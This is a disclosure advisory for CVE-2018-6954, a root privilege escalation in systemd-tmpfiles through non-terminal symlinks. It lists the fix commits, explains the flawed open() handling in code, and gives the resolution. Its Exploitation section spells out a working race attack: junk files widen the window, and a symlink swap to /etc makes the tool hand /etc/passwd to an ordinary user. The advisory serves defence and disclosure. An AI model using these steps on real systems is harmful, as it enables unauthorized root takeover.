michael orlitzky

CVE-2018-6954: systemd-tmpfiles root privilege escalation by following non-terminal symlinks

Product
systemd (systemd-tmpfiles)
Versions affected
239 and earlier
Published on
2018-12-21
Author
Michael Orlitzky
Fixed in
  1. Version 240
  2. Pull request 8358:
    1. Commit 774f79b5
    2. Commit 56114d45
    3. Commit 936f6bdb
    4. Commit caced732
    5. Commit e04fc13f
  3. Pull request 8822:
    1. Commit 31c84ff1
    2. Commit b206ac8e
    3. Commit 14f3480a
    4. Commit 5ec9d065
    5. Commit b1f7b17f
    6. Commit 16ba55ad
    7. Commit 14ab804e
    8. Commit 551470ec
    9. Commit 074bd73f
    10. Commit c7700a77
    11. Commit 4ad36844
    12. Commit 54946021
    13. Commit 1f56e4ce
    14. Commit 4c39d899
    15. Commit 1e912631
    16. Commit 62f9666a
    17. Commit a2fc2f8d
    18. Commit 7ea5a87f
    19. Commit 4fe3828c
    20. Commit 2c3d5add
    21. Commit 7e531a52
    22. Commit a12e4ade
    23. Commit 43231f00
    24. Commit addc3e30
    25. Commit 9f36a8fb
    26. Commit 7f6240fa
Bug report
https://github.com/systemd/systemd/issues/7986
MITRE
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6954
OSS-security
https://www.openwall.com/lists/oss-security/2018/12/22/1
Acknowledgments
Franck Bui of SUSE put forth a massive amount of effort to fix this, and Lennart Poettering consistently provided timely reviews over the course of a few months.

Summary

Before version 240, the systemd-tmpfiles program will follow symlinks present in a non-terminal path component while adjusting permissions and ownership. Often—and particularly with Z type entries—an attacker can introduce such a symlink and take control of arbitrary files on the system to gain root. The fs.protected_symlinks sysctl does not prevent this attack. Version 239 contained a partial fix, but only for the easy-to-exploit recursive Z type entries.

Details

The systemd-tmpfiles program tries to avoid following symlinks in the last component of a path. To that end, the following trick is used in src/tmpfiles/tmpfiles.c:

  fd = open(path, O_NOFOLLOW|O_CLOEXEC|O_PATH);
  ...
  xsprintf(fn, "/proc/self/fd/%i", fd);
  ...
  if (chown(fn, ...

The call to chown will follow the /proc/self/fd/%i symlink, but only once; it will then operate on the real file described by fd.

However, there is another way to exploit the code above. The call to open() will follow symlinks if they appear in a non-terminal component of path, even with the O_NOFOLLOW flag set. Citing the open(2) man page,

O_NOFOLLOW

If pathname is a symbolic link, then the open fails, with the error ELOOP. Symbolic links in earlier components of the pathname will still be followed.

So, for example, if the path variable contains /run/foo/a/b and if a is a symlink, then open() will follow it. If systemd-tmpfiles will be changing ownership of /run/foo/a/b after that of /run/foo, then the owner of /run/foo can exploit that fact to gain root by replacing /run/foo/a with a symlink. With a Z-type tmpfiles.d entry, the attacker can create this situation himself.

The fs.protected_symlinks sysctl does not protect against these sorts of attacks. Due to the widespread and legitimate use of symlinks in situations like these, the symlink protection is much weaker than the corresponding hardlink protection.

Exploitation

Consider the following entry in /etc/tmpfiles.d/exploit-recursive.conf:

d /var/lib/systemd-exploit-recursive 0755 mjo mjo
Z /var/lib/systemd-exploit-recursive 0755 mjo mjo

After systemd-tmpfiles has run once, my mjo user will own that directory:

mjo $ sudo ./build/systemd-tmpfiles --create
mjo $ ls -ld /var/lib/systemd-exploit-recursive
drwxr-xr-x 2 mjo mjo 4.0K 2018-02-13 09:38 /var/lib/systemd-exploit-recursive

At this point, I am able to create a directory foo and a file foo/passwd under /var/lib/systemd-exploit-recursive. The next time that systemd-tmpfiles is run (perhaps after a reboot), the following function will be called on foo:

static int item_do_children(Item *i, const char *path, action_t action) {
        _cleanup_closedir_ DIR *d;
        struct dirent *de;
        int r = 0;

        assert(i);
        assert(path);

        /* This returns the first error we run into, but nevertheless
         * tries to go on */

        d = opendir_nomod(path);
        if (!d)
                return IN_SET(errno, ENOENT, ENOTDIR, ELOOP) ? 0 : -errno;

        FOREACH_DIRENT_ALL(de, d, r = -errno) {
                _cleanup_free_ char *p = NULL;
                int q;

                if (dot_or_dot_dot(de->d_name))
                        continue;

                p = strjoin(path, "/", de->d_name);
                if (!p)
                        return -ENOMEM;

                q = action(i, p);
                if (q < 0 && q != -ENOENT && r == 0)
                        r = q;

                if (IN_SET(de->d_type, DT_UNKNOWN, DT_DIR)) {
                        q = item_do_children(i, p, action);
                        if (q < 0 && r == 0)
                                r = q;
                }
        }

        return r;
}

The FOREACH_DIRENT_ALL macro defers to readdir(3), and thus requires the real directory stream pointer for foo, because we want it to see foo/passwd. However, while the macro is iterating, q = action(i, p) is performed on the string p, which is built by joining path = "foo" with the entry name de->d_name. The action therefore receives a path, with no reference to the file descriptor of the directory that is being read. So, between the time that item_do_children() is called on foo and the time that q = action(i, p) is run on foo/passwd, I have the opportunity to replace foo with a symlink to /etc, causing /etc/passwd to be affected by the change of ownership and permissions.

But there's more: the FOREACH_DIRENT_ALL macro processes the contents of foo in whatever order readdir returns them. Since mjo owns foo, I can fill it with junk to buy myself as much time as I like before foo/passwd is reached:

mjo $ cd /var/lib/systemd-exploit-recursive
mjo $ mkdir foo
mjo $ cd foo
mjo $ echo $(seq 1 500000) | xargs touch
mjo $ touch passwd

Now, restarting systemd-tmpfiles will change ownership of all of those files…

mjo $ sudo ./build/systemd-tmpfiles --create

and it takes some time for it to process the 500,000 dummy files before reaching foo/passwd. At my leisure, I can replace foo with a symlink:

mjo $ cd /var/lib/systemd-exploit-recursive
mjo $ mv foo bar && ln -s /etc ./foo

Eventually, systemd-tmpfiles will reach the path foo/passwd, which now points to /etc/passwd, and give me ownership of that file and, with it, root access.

A similar, but more difficult attack works against non-recursive entry types. Consider the following tmpfiles.d entry:

d /var/lib/systemd-exploit 0755 mjo mjo
d /var/lib/systemd-exploit/foo 0755 mjo mjo
f /var/lib/systemd-exploit/foo/bar 0755 mjo mjo

After /var/lib/systemd-exploit/foo is created but before the permissions are adjusted on /var/lib/systemd-exploit/foo/bar, there is a short window of opportunity for me to replace foo with a symlink to (for example) /etc/env.d. If I'm fast enough, tmpfiles will open foo/bar, following the foo symlink, and give me ownership of something sensitive in the /etc/env.d directory. However, this attack is more difficult because I can't arbitrarily widen my own window of opportunity with junk files, as was possible with the Z type entries.

Resolution

Commit 936f6bdb, which is present in systemd v239, changes the recursive loop in two important ways. First, it passes file descriptors—rather than parent paths—to each successive iteration. That allows the next iteration to use the openat() system call, eliminating the non-terminal path components from the equation. Second, it ensures that each “open” call has the O_NOFOLLOW and O_PATH flags to prevent symlinks from being followed at the current depth. Note: only the recursive loop was made safe; the call to open() the top-level path will still follow non-terminal symlinks and is vulnerable to the second attack above.

The commits in pull request 8822 aim to make everything safe from this type of symlink attack. As far as tmpfiles is concerned, the main idea is to use the chase_symlinks() function in place of the open() system call. Since chase_symlinks() calls openat() recursively from the root up, it will never follow a non-terminal symlink. Commit 1f56e4ce then introduces the CHASE_NOFOLLOW flag for that function, preventing it from following terminal symlinks. In subsequent commits (e.g. addc3e30), the consumers of chase_symlinks() were updated to pass CHASE_NOFOLLOW, preventing them from following any symlinks.

The complete fix is available in systemd v240.